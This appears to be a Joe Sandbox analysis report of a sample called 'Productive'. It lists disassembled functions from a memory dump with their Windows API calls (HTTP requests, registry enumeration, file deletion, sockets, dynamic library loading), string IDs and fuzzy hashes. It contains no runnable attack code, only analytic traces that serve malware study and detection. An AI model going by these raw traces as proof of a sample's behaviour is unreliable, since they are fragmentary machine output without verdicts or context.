                                                                                                                                                                • Instruction Fuzzy Hash: 7D319071910229AFCF11EF94D941AEEB3B5FF15310B10862AF866A76D1DB31AD15CF80
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0030B7BD
                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00309ACC
                                                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00309ADF
                                                                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00309B0F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$ClassName
                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                • API String ID: 787153527-1403004172
                                                                                                                                                                • Opcode ID: f399a10dc216311af6e53d5ff4aeb31f2daf8258737a93895235e2d758404055
                                                                                                                                                                • Instruction ID: ae9fcb1996dbd710592f28ee92abf0bfeaa5d4a461906ee42db4e838c203ae97
                                                                                                                                                                • Opcode Fuzzy Hash: f399a10dc216311af6e53d5ff4aeb31f2daf8258737a93895235e2d758404055
                                                                                                                                                                • Instruction Fuzzy Hash: E2212871A021047EDB19EBA4DC96EFEB76CDF46360F10421AF815A72E2DB345D158A20
                                                                                                                                                                APIs
                                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00321F18
                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00321F3E
                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00321F6E
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00321FB5
                                                                                                                                                                  • Part of subcall function 00322B4F: GetLastError.KERNEL32(?,?,00321EE3,00000000,00000000,00000001), ref: 00322B64
                                                                                                                                                                  • Part of subcall function 00322B4F: SetEvent.KERNEL32(?,?,00321EE3,00000000,00000000,00000001), ref: 00322B79
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                                                                • Opcode ID: f2dc9a76eefa25dcebfa76d12ba7632296a47a302e5a0f0c7c4c173e1bdaf373
                                                                                                                                                                • Instruction ID: 49403045d74ee3422ec493a45621c88f586df813afd00be34bd4d2b6eac1790e
                                                                                                                                                                • Opcode Fuzzy Hash: f2dc9a76eefa25dcebfa76d12ba7632296a47a302e5a0f0c7c4c173e1bdaf373
                                                                                                                                                                • Instruction Fuzzy Hash: 4821D7B56042187FE7139F20EE85EBF7BADEB49B44F10411AF90596200DB349D045BB1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B214F
                                                                                                                                                                  • Part of subcall function 002B2111: GetStockObject.GDI32(00000011), ref: 002B2163
                                                                                                                                                                  • Part of subcall function 002B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B216D
                                                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00336A86
                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00336A8D
                                                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00336AA2
                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00336AAA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                                                                • Opcode ID: b99070b202be0a853005a8a54465fb47bc854b8c1e7b8e7c1983f906e0f6352e
                                                                                                                                                                • Instruction ID: 6c32389e4e70bb3f7ae80ee71d10749515a4780fc35fe59774e800262679dcf7
                                                                                                                                                                • Opcode Fuzzy Hash: b99070b202be0a853005a8a54465fb47bc854b8c1e7b8e7c1983f906e0f6352e
                                                                                                                                                                • Instruction Fuzzy Hash: 7A21BBB1210205BFEF128F649CC2EBB37ACEB49324F11C218FA51A7190D7319C909B60
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00317377
                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003173AA
                                                                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 003173BC
                                                                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003173F6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                                                                • String ID: nul
                                                                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                                                                • Opcode ID: b4593dc162fbf189ac80b3483f0a02d487a0f09cd4fcfe6b07bf4ce9057ded27
                                                                                                                                                                • Instruction ID: 823e5e7f5b9de400bc0dd4007a08a5f8b6f31077272d5f9a863f190b2de4bb33
                                                                                                                                                                • Opcode Fuzzy Hash: b4593dc162fbf189ac80b3483f0a02d487a0f09cd4fcfe6b07bf4ce9057ded27
                                                                                                                                                                • Instruction Fuzzy Hash: 382186786043069BDB2A8F65DC05AD977B8AF49720F244F19FDB0D72D0D7709891DB90
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00317444
                                                                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00317476
                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00317487
                                                                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003174C1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                                                                • String ID: nul
                                                                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                                                                • Opcode ID: 48b1b210cca66afbc1227da69e8e15d037d62e2ff0c3c9309b512645d56fff02
                                                                                                                                                                • Instruction ID: 48be31bef44fe4f7c6feebf81f21b96ecdc426d4fb26b996e91d5c4c0d134ac1
                                                                                                                                                                • Opcode Fuzzy Hash: 48b1b210cca66afbc1227da69e8e15d037d62e2ff0c3c9309b512645d56fff02
                                                                                                                                                                • Instruction Fuzzy Hash: 9321F4346083059BDB2A8F6ADC05AD97BB8AF59330F240B09FDA0D72D0DF709881CB50
                                                                                                                                                                APIs
                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00312318
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                • API String ID: 3964851224-769500911
                                                                                                                                                                • Opcode ID: 853b16acb4136b51962fbabc03f52d4134b009dd134dc8e8fa6d4b39b44796a9
                                                                                                                                                                • Instruction ID: 63b94e4c4f7b92528e8acecd9e5efc27c23cec7e27d2d623ff2b37405b744c12
                                                                                                                                                                • Opcode Fuzzy Hash: 853b16acb4136b51962fbabc03f52d4134b009dd134dc8e8fa6d4b39b44796a9
                                                                                                                                                                • Instruction Fuzzy Hash: F11182389101189FCF05EF94C8515EEB3B4FF1A304F10846AD81197362DB365E66CF40
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002D9D29,002D7EFD,0036CD38,00000014), ref: 002D9E86
                                                                                                                                                                • DeleteCriticalSection.KERNEL32(0R7,?,?,002D9D29,002D7EFD,0036CD38,00000014), ref: 002D9EAF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalDeleteSection
                                                                                                                                                                • String ID: 7$ 7$0R7
                                                                                                                                                                • API String ID: 166494926-1956675016
                                                                                                                                                                • Opcode ID: c212a38cba3ced2119371c5d415806a644fc6efefb057ebe35f0937da0efc6a8
                                                                                                                                                                • Instruction ID: 2df830ca8fb652ab79aa9a3c003217afc0a44e72cf32e7b5737c9443f0d0825f
                                                                                                                                                                • Opcode Fuzzy Hash: c212a38cba3ced2119371c5d415806a644fc6efefb057ebe35f0937da0efc6a8
                                                                                                                                                                • Instruction Fuzzy Hash: 0BF0FF36920312DBD77D8F28EC8810ABBA8AB41336F200627F12DC62A18B348CE0C950
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00319A0D
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?), ref: 00319AB6
                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00319ACC
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00319ADD
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00319AEF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Delete$Copy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3226157194-0
                                                                                                                                                                • Opcode ID: c886d028ffb6c52cd59602c4405432bba90b9185ccc0a226079b5c1fbd26bdd8
                                                                                                                                                                • Instruction ID: 3f7adeef7c1781039c96391f4841019f9bb83e56a079b138e139411da07bb31f
                                                                                                                                                                • Opcode Fuzzy Hash: c886d028ffb6c52cd59602c4405432bba90b9185ccc0a226079b5c1fbd26bdd8
                                                                                                                                                                • Instruction Fuzzy Hash: 73C13BB1D00228AEDF15DF95CC95EDEB7BDAF49300F0040ABF609E6251EB709A948F65
                                                                                                                                                                APIs
                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,0036D050,7FFFFFFF,00000000,?,002EB196,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 002EAF72
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002EB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 002EAFEC
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002EB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 002EB067
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002EB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 002EB080
                                                                                                                                                                  • Part of subcall function 002D593C: RtlAllocateHeap.NTDLL(01390000,00000000,00000001,?,00000004,?,?,002D1003,?), ref: 002D597F
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002EB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 002EB0FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1443698708-0
                                                                                                                                                                • Opcode ID: 6a6ef278bc0019fc26d2d90bbc3a9cc8c6c049cba91694f6a63f8ee06d989afe
                                                                                                                                                                • Instruction ID: 5cb0773c917c5d5f4c00deb6e24f8aa8637588b7dc640935c81178d4009b9a21
                                                                                                                                                                • Opcode Fuzzy Hash: 6a6ef278bc0019fc26d2d90bbc3a9cc8c6c049cba91694f6a63f8ee06d989afe
                                                                                                                                                                • Instruction Fuzzy Hash: D38107B1E6019A9FDF219F56D851AFF7BB9EF45320F940019E858E7240D732EC208B91
                                                                                                                                                                APIs
                                                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003272EB
                                                                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0032730C
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0032731F
                                                                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00327392
                                                                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 003273D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLasthtonsinet_ntoa
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2227131780-0
                                                                                                                                                                • Opcode ID: 086fbb09e3f6948437103290380da0bcb37562f39e7622bef39c1853e13e3126
                                                                                                                                                                • Instruction ID: 94364644af709508d8dd0ce54b99921479454f5ed170818534a05b574c89e433
                                                                                                                                                                • Opcode Fuzzy Hash: 086fbb09e3f6948437103290380da0bcb37562f39e7622bef39c1853e13e3126
                                                                                                                                                                • Instruction Fuzzy Hash: BA81E271518310ABC315FB25EC92FABB7A8EF84714F104A1DF9559B292DB30ED11CB92
                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0032F2F0
                                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0032F320
                                                                                                                                                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0032F453
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0032F4D4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2364364464-0
                                                                                                                                                                • Opcode ID: e5a6293f100c7706812bef0a716d4eedae0684264ba6e861ebaf8ec9c2ec25f9
                                                                                                                                                                • Instruction ID: a08effc1afa88082bf0bf3b6dc61531bd349ed7df830319e58b6ab3428b2d660
                                                                                                                                                                • Opcode Fuzzy Hash: e5a6293f100c7706812bef0a716d4eedae0684264ba6e861ebaf8ec9c2ec25f9
                                                                                                                                                                • Instruction Fuzzy Hash: FC81B0756103119FD725EF28D882F6AB7F5AF48710F14882DF999DB292DBB0AC108F91
                                                                                                                                                                APIs
                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0030F6A2
                                                                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 0030F714
                                                                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0030F76F
                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0030F7E6
                                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0030F814
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4136290138-0
                                                                                                                                                                • Opcode ID: f4ff913696a29fb96d280b887cdf72bdeb97fee7635e79539bcdb1f3a1b1d65f
                                                                                                                                                                • Instruction ID: 9504a095185daab29e775e59901e4bd618d07a26a83dbd219fe1a58b632003b7
                                                                                                                                                                • Opcode Fuzzy Hash: f4ff913696a29fb96d280b887cdf72bdeb97fee7635e79539bcdb1f3a1b1d65f
                                                                                                                                                                • Instruction Fuzzy Hash: FC514CB5A00209EFCB25CF58C894AAAB7B8FF4C354B15856AE959DB341D730E911CFA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0033147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0033040D,?,?), ref: 00331491
                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0033075D
                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0033079C
                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003307E3
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 0033080F
                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0033081C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3740051246-0
                                                                                                                                                                • Opcode ID: fb3440a867416f1b03fdc36be52d9e281746749f77f0792eae05f34f89df095c
                                                                                                                                                                • Instruction ID: 0b5b32ab27ff2cadcf87a46c608a8234b561b502baadbc285af6fdddc4f6544c
                                                                                                                                                                • Opcode Fuzzy Hash: fb3440a867416f1b03fdc36be52d9e281746749f77f0792eae05f34f89df095c
                                                                                                                                                                • Instruction Fuzzy Hash: BF516931218204AFC719EF64C892F6AB7E9FF85304F00891DF5958B2A2DB31E915CF92
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0032E010
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0032E093
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0032E0AF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0032E0F0
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0032E10A
                                                                                                                                                                  • Part of subcall function 002C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00317E51,?,?,00000000), ref: 002C4041
                                                                                                                                                                  • Part of subcall function 002C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00317E51,?,?,00000000,?,?), ref: 002C4065
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
